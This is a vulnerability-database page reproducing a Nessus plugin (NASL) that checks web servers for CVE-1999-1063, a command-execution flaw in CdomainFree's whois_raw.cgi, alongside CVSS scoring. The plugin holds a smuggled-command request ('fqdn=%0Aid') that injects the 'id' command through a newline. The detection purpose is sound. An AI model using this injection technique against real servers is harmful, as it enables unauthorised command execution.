Lucene search

K
nessusThis script is Copyright (C) 1999-2021 Tenable Network Security, Inc.WHOIS_RAW.NASL
HistoryJun 22, 1999 - 12:00 a.m.

CDomain whois_raw.cgi fqdn Parameter Arbitrary Command Execution

1999-06-2200:00:00
This script is Copyright (C) 1999-2021 Tenable Network Security, Inc.
www.tenable.com
74

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.218 Low

EPSS

Percentile

96.5%

The remote host appears to be using the CdomainFree ‘whois_raw.cgi’ script.

This CGI script allows an attacker to view any file on the target computer, as well as to execute arbitrary commands.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if(description)
{
 script_id(10306);
 script_version("1.44");
 script_cve_id("CVE-1999-1063");
 script_bugtraq_id(304);
 
 script_name(english:"CDomain whois_raw.cgi fqdn Parameter Arbitrary Command Execution");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that is prone to arbitrary
command execution attacks." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be using the CdomainFree 'whois_raw.cgi'
script. 

This CGI script allows an attacker to view any file on the target
computer, as well as to execute arbitrary commands." );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9160cb71" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to CdomainFree 2.5 or to one of the commercial versions." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "1999/06/01");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_summary(english:"Checks if whois_raw.cgi is vulnerable");
 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 1999-2021 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl", "httpver.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
  http_check_remote_code(
    unique_dir:dir,
    check_request:string("/whois_raw.cgi?fqdn=%0Aid"),
    check_result:"uid=[0-9]+.*gid=[0-9]+.*",
    command:"id",
    port:port
  );
}

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.218 Low

EPSS

Percentile

96.5%

Related for WHOIS_RAW.NASL